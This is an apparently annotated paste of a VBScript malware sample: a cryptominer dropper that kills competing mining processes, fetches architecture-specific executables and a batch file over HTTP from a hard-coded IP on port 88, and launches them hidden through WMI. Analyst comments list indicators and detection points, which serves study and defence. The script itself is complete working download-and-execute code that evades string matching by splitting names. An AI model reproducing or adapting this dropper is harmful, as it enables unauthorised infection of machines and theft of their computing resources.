
Untitled

benkow_ Sep 23rd, 2015 (edited) 532 Never
  ' Analyst note: script-wide error suppression. Any call below that fails is skipped silently,
  ' so this sample will not surface error dialogs or a non-zero exit on a partially hardened host.
  1. On Error Resume Next
  2. Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService
  ' Host survey through the WMI registry provider (StdRegProv). &H80000002 is HKEY_LOCAL_MACHINE.
  ' The three values read here (default language ID, Windows version, processor count) are not
  ' referenced again anywhere in the visible script.
  3. Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\DEFAULT:StdRegProv")
  4. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Nls\Language", "Default",OSlag)
  5. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion",OSver)
  6. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "NUMBER_OF_PROCESSORS",numcpus)
  ' GetSpecialFolder(0) resolves the Windows directory.
  7. Set objFSO = CreateObject("Scripting.FileSystemObject")
  8. windir = objFSO.GetSpecialFolder(0)
  ' needdl defaults to 1 ("payload must be fetched"); it is cleared further down when a process
  ' carrying one of two hard-coded command-line markers is already running.
  9. Dim needdl
  10. needdl = 1
  11.  
  ' Analyst note: eight hard-coded browser User-Agent strings (the last two are identical). One is
  ' picked at random below and sent by dl(), so the download requests claim to come from a browser
  ' although the client is the WinHTTP COM object. A browser User-Agent on a request issued by a
  ' script host is a useful proxy/EDR correlation point.
  12. user_agent_list=array("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", _
  13.               "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", _
  14.               "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16", _
  15.               "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", _
  16.               "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15", _
  17.               "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", _
  18.               "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", _
  19.               "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)")
  ' X is the array index used by dl(); 7*Rnd() rounded by CInt yields a value from 0 to 7.
  20. Randomize
  21. X=CInt(7*Rnd())
  22.  
  ' Analyst note: process enumeration and termination over WMI on the local machine (".").
  ' The WQL text is assembled from fragments that concatenate to "SELECT * FROM Win32_Process";
  ' splitting the string this way presumably defeats naive string matching on the script body.
  23. strComputer = "."
  24. Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
  25. Set cols=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
  ' Pass 1: terminate any process whose command line contains "-manliana" or whose image path
  ' contains "smssm.exe" (both compared case-insensitively). What those processes are is not
  ' shown on this page; possibly an earlier or competing instance.
  26. For Each objItemm in cols
  27. If InStr(1,LCase(objItemm.CommandLine), LCase("-manliana")) > 0 Then objItemm.Terminate
  28. If InStr(1,LCase(objItemm.ExecutablePath), LCase("smssm.exe")) > 0 Then objItemm.Terminate
  29. Next
  ' Five-second pause before the process list is read again.
  30. wscript.sleep 5000
  31. Set colProcessList1=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
  32. For Each objItem in colProcessList1
  ' Pass 2a: if a running command line contains either hard-coded marker, skip the download.
  ' The two strings look like wallet or account identifiers (not confirmed by this page) and are
  ' good literal hunting terms for process command-line telemetry.
  33. If InStr(1,objItem.CommandLine, "CGX2U2oeocN3DTJhyPG2cPg7xpRRTzNZkz") > 0 Then needdl = 0
  34. If InStr(1,objItem.CommandLine, "CcTzQsSWvf1zhbMA3kf2rpYxogEMcVjmJ3") > 0 Then needdl = 0
  ' Pass 2b: terminate any process with "stratum+tcp://" on its command line. That URL scheme is
  ' used by Stratum mining-pool clients, so this targets mining processes already on the host.
  35. If InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0 Then
  36.     objItem.Terminate
  37. End If
  ' Pass 2c: notsyspath is True unless the image path is one of five named system32 binaries;
  ' hcline is True when the command line contains "-datadir=", "ypool.net" or "stratum+tcp://".
  ' The Terminate call below is made on objProcess, a name that is never assigned in the visible
  ' script; with errors suppressed, that call would fail without any visible effect.
  38. notsyspath = not(InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\lsass.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\services.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\csrss.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\winlogon.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\smss.exe") > 0)
  39. hcline = InStr(1,LCase(objItem.CommandLine), "-datadir=") > 0 Or InStr(1,LCase(objItem.CommandLine), "ypool.net") > 0 Or InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0
  40. if notsyspath and hcline then
  41. objProcess.Terminate
  42. End If
  43. Next
  44.  
  ' Analyst note: download-and-execute stage, reached only when neither command-line marker was
  ' found among running processes. Both branches fetch an executable matching the architecture
  ' plus the same batch file over plain HTTP, then launch the batch file and exit.
  ' Indicators visible on this page:
  '   network : http://66.186.188.227:88/32.exe, /64.exe, /mst.bat  (TCP port 88)
  '   files   : c:\windows\temp\mstdc.exe, c:\windows\temp\sst.bat
  ' The contents of the executables and of mst.bat are not part of this paste. Only the batch
  ' file is started here; how mstdc.exe is launched is presumably defined inside it.
  ' If X86orX64() returns anything other than "x86" or "x64", nothing is downloaded.
  45. If needdl = 1 Then
  46. OStype = X86orX64()
  47. if OStype = "x86" Then
  48. dl "http://66.186.188.227:88/32.exe","c:\windows\temp\mstdc.exe"
  49. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
  50. runprg "c:\windows\temp\sst.bat"
  51. WScript.Quit
  52. ElseIf OStype = "x64" Then
  53. dl "http://66.186.188.227:88/64.exe","c:\windows\temp\mstdc.exe"
  54. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
  55. runprg "c:\windows\temp\sst.bat"
  56. WScript.Quit
  57. End If
  58. End If
  ' dl(u, f): fetch URL u with a synchronous HTTP GET and write the response body to path f.
  '   u - URL to request.
  '   f - destination file path; an existing file is overwritten (SaveToFile option 2).
  ' Analyst note: the COM ProgIDs are built from fragments that concatenate to
  ' "WinHttp.WinHttpRequest.5.1" and "Adodb.Stream", so a literal search of the script for those
  ' names will miss them. The User-Agent comes from the script-level user_agent_list and index X.
  ' The HTTP status is never checked and the body is not verified in any way; whatever the server
  ' returns is written to disk. A script host instantiating these two objects and then writing an
  ' executable or batch file is a common detection pattern for script-based downloaders.
  59. Function dl(u,f)
  60. dim xHttp:Set xHttp = createobject("WinH" & "ttp.WinHt" & "tpRequ" & "est.5.1")
  61. dim bStrm:Set bStrm = createobject("Ad" & "od" & "b.S" & "tre" & "am")
  ' Third argument 0 = not asynchronous: Send blocks until the response has arrived.
  62. xHttp.Open "GET",u, 0
  63. xHttp.SetRequestHeader "User-Agent", user_agent_list(X)
  64. xHttp.Send
  65. with bStrm
  ' Stream type 1 = binary, so the body is written byte-for-byte.
  66. .type = 1
  67. .open
  68. .write xHttp.responseBody
  69. .savetofile f,2
  70. .close
  71. end with
  72. End Function
  ' runprg(ppath): start the command line ppath through WMI (Win32_Process.Create) with a hidden
  ' window.
  '   ppath - command line handed to Win32_Process.Create unchanged.
  ' Analyst note: no shell object is used. Processes started through Win32_Process.Create are
  ' typically parented by the WMI provider host rather than by the calling script host, so
  ' parent/child rules keyed on wscript.exe or cscript.exe may not see this launch; WMI activity
  ' and process-creation telemetry are the better sources here.
  73. Function runprg(ppath)
  74. Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2")
  75. Set objStartup = objPS.Get("Win32_ProcessStartup")
  76. Set objConfig = objStartup.SpawnInstance_()
  ' ShowWindow = 0 asks for the new process's window to be hidden.
  77. objConfig.ShowWindow = 0
  78. Set objShare = objPS.Get("Win32_Process")
  79. Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
  80. objInParam.Properties_.Item("CommandLine") =  ppath
  81. objInParam.Properties_.Item("ProcessStartupInformation") =  objConfig
  ' The result object is stored but never inspected, so a failed launch goes unnoticed.
  82. Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
  83. End Function
  ' X86orX64(): report the machine architecture from Win32_ComputerSystem.SystemType.
  ' Returns "x86" when SystemType contains "86", "x64" when it contains "64", otherwise the raw
  ' SystemType string. If the query yields no rows the return value is never assigned.
  ' Analyst note: the caller uses this only to pick between the 32.exe and 64.exe downloads.
  84. Function X86orX64()
  85.     On Error Resume Next
  86.     strComputer = "."
  87.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  88.     Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
  89.     For Each objItem in colItems
  ' "86" is tested first; the "64" branch is reached only when "86" is absent from the string.
  90.         If InStr(objItem.SystemType, "86") <> 0 Then
  91.             X86orX64 = "x86"
  92.         ElseIf InStr(objItem.SystemType, "64") <> 0 Then
  93.             X86orX64 = "x64"
  94.         Else
  95.             X86orX64 = objItem.SystemType
  96.         End If
  97.     Next
  98. End Function
  ' wlog(slog): write one line of text to "wb2010kb.log" in the Windows directory, replacing any
  ' existing file (CreateTextFile overwrite argument 1).
  '   slog - text to write.
  ' Analyst note: nothing in the visible script calls this function, so the log file may never
  ' be created by this sample. The file name is still worth keeping as a low-confidence indicator
  ' in case related variants do call it.
  99. Function wlog(slog)
  100. Set objFSO = CreateObject("Scripting.FileSystemObject")
  ' GetSpecialFolder(0) resolves the Windows directory.
  101. windir = objFSO.GetSpecialFolder(0)
  102. Set f = objFSO.CreateTextFile(windir + "\wb2010kb.log",1)
  103. f.WriteLine(slog)
  104. f.Close
  105. Set objFSO = Nothing
  106. End Function